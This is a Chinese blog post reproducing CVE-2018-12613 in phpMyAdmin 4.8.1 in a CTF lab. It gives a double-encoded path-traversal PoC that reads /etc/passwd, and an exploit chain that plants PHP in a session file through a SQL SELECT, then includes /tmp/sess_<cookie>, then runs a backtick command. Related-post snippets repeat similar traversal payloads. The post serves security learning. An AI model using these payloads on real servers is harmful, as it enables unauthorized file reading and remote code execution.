phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）漏洞复现

CVE-2018-12613：SQL注入漏洞利用与系统命令执行

最新推荐文章于 2025-01-08 09:06:32 发布

原创最新推荐文章于 2025-01-08 09:06:32 发布 · 341 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全

安全同时被 3 个专栏收录

49 篇文章

订阅专栏

CTF

40 篇文章

订阅专栏

WEB安全

38 篇文章

订阅专栏

本文介绍了CVE-2018-12613环境下的SQL注入漏洞，展示了如何通过session文件获取敏感信息，并演示了构造payload执行系统命令的过程。重点在于攻击方法和实际操作步骤。

（CVE-2018-12613）

环境搭建

github传送门
 BUU传送门

poc

?target=db_sql.php%253f/../../../../../../../../etc/passwd

在这里插入图片描述

exp

这边利用包含session文件来获取

首先在SQL处执行

select '<?php phpinfo();?>';

在这里插入图片描述
复制下来cookie，构造payload

http://node3.buuoj.cn:27757/?target=db_sql.php%253f/../../../../../../../../tmp/sess_bb17e2919e913196389bffbc020a4cfa

在ubuntu下，session文件的存放位置为/tmp文件夹下，命名为sess_+cookie,例：

sess_bb17e2919e913196389bffbc020a4cfa

在这里插入图片描述

这里应该也可以执行系统命令，可以构造

select '<?php echo `ls`;?>';

按照上面的方法再来一次就可以获取到所有的目录然后进行包含。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

imbia

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

千寻的博客

03-14

1386

phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。攻击者可利用该漏洞包含（查看并可能执行）服务器上的文件。

红队攻防实战之phpmyadmin-RCE集锦

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

12-10

1254

世界上只有一种真正的英雄主义，那就是认清了生活的真相后，仍然热爱她

参与评论您还未登录，请先登录后发表或查看评论

[Vulhub]（CVE-2018-12613）phpmyadmin 4.8.1远程文件包含漏洞

weixin_45605352的博客

05-06

1412

0x01 预备知识什么是文件包含漏洞？攻击者利用包含的特性，加上应用本身对文件（包含）控制不严格，最终造成攻击者进行任意文件包含。（注：包含的文件会被当成脚本文件来解析）一句话来说就是：文件包含并不属于漏洞，但是由于对包含进来的文件不可控，导致了文件包含漏洞的产生。本地文件包含叫做LFI，远程文件包含叫做RFI，默认PHP不开启远程文件包含。相关函数 include：PHP运行到include然后去调用被包含文件执行，如果包含文件不存在则报错，但是会继续往下执行； require：PHP在运

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)漏洞复现

qq_43200143的博客

01-29

430

漏洞利用过程： vulhub.org docker环境启动后 1.访问 http://your-ip:8080 访问phpmyadmin。配置的是config模式，无需输入密码，直接登录test账户 2.访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 即可包含本地文件还可以进行getshell 思路：把webshell写入到数据.

phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现

Senimo

12-11

2512

漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP：phpMyAdmin 4.8.1 CVE：CVE-2018-12613 类型：远程文件包含 下载phpMyAdmin 4.8.1源码漏洞问题出现在index.php页面55~63： // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str

漏洞复现---phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

最新发布

peng05的博客

01-08

830

然而，在phpMyAdmin4.8.1版本中，存在一个远程文件包含漏洞，使得攻击者能够利用该漏洞包含并执行服务器上的任意文件。phpMyAdmin的index.php中存在一处文件包含逻辑，通常用于加载不同的脚本或页面。使用白名单或可包含目录：限制文件包含的范围，只允许包含白名单中的文件或特定目录下的文件。写入恶意文件：攻击者可以将恶意代码写入服务器上的文件，从而实现对服务器的远程控制。在正常情况下，该逻辑会对传入的参数进行严格的检查，以防止恶意文件的包含。攻击者通过二次编码的方式，将恶意参数绕过检查。

phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)

weixin_63231007的博客

10-08

3158

_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值（ ‘import.php’, ‘export.php’）target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。

phpMyAdmin 4.8.1后台文件包含漏洞（CVE-2018-12613）

qq_45521281的博客

04-27

5687

这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞，从配置到原理，再到漏洞复现进行讲解，更重要的是让大家了解这些真实漏洞背后的知识。文章目录一.phpMyAdmin二.phpMyAdmin基础用法三.漏洞原理四.phpMyAdmin漏洞复现一.phpMyAdmin phpMyAdmin是一种MySQL数据库的管理工具，安装该工具后，即可通过Web形式直接管理MySQL数据，而...

phpMyAdmin要嵌入到已有的界面

bjx18356163055的博客

02-13

556

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，

phpMyAdmin-4.6.6

04-06

phpMyAdmin-4.6.6-all-languages

phpMyAdmin 常见漏洞利用记录

The current road is different, love needs to distinguish between right and wrong

11-26

2907

目录简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取（wooyun-2016-199433） CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语简介 phpMyAdmin 是一个以PHP为基础，以WebBase方式架构在网站主机上的MySQL的数据库...

phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞（测试）

cj_Hydra's Blog

04-23

1928

前言：最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁，而且一直都朦胧不清，也没去学习，在不久前的DDCTF和国赛，还有最近的Nu1lCTF中都考到了这个点，利用Load data infile语法。在mysql客户端登陆mysql服务端后，客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;，从而可以导致my...

phpmyadmin 0day exp

weixin_34014277的博客

07-13

311

虽然还是很鸡肋（要求根目录下存在config文件夹且可写），不过好很多了。可以无视session.auto_start配置了。 #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ pma...

phpMyAdmin 漏洞小集合

SoulCat

08-07

6329

phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞（CVE-2016-5734）+4.8.1 远程文件包含漏洞（CVE-2018-12613）有情有义又是无米之炊，无情无义却是饕餮盛宴. 远程代码执行漏洞（CVE-2016-5734） phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修...

[CVE-2018-12613]phpmyadmin4.8.1远程文件包含漏洞复现

https://www.cnblogs.com/zpchcbd/

08-31

571

漏洞原理：一个攻击者可以在服务器上包含（查看和潜在执行）文件的漏洞被发现。该漏洞来自一部分代码，其中页面在phpMyAdmin中被重定向和加载，以及对白名单页面进行不正确的测试。攻击者必须经过身份验证，但在这些情况下除外： $ cfg [‘AllowArbitraryServer’] = true：攻击者可以指定他/她已经控制的任何主机，并在phpMyAdmin上执行任意代码 $ cfg [‘S...

phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)

蜡笔小新说安全的博客

06-23

442

phpMyAdmin Transformation 任意文件包含漏洞 (需登录) 2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞，影响4.8.0~4.8.3版本，CVE编号CVE-2018-19968。这是一个需要登陆利用的漏洞，首先需要实现登陆，在已只用户名和密码的情况下我们先登陆查看查看网页情况，先实现手工注入再编写exp脚本，我们实验的是一个已经搭建好的靶机地址为：靶机登陆后查看第一步：创

Ubuntu18.04安装phpMyAdmin

α-geek的专栏

05-28

6179

安装一、使用apt自动安装 sudo apt install phpmyadmin 安装完成后，创建软链接到web根目录下（我的是/var/www/html/) sudo ln -s /usr/share/phpmyadmin /var/www/html/phpmyadmin 二、手动安装首先去phpmyadmin官网下载最新源码，当前最新的是4.8.1。下载完...

[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识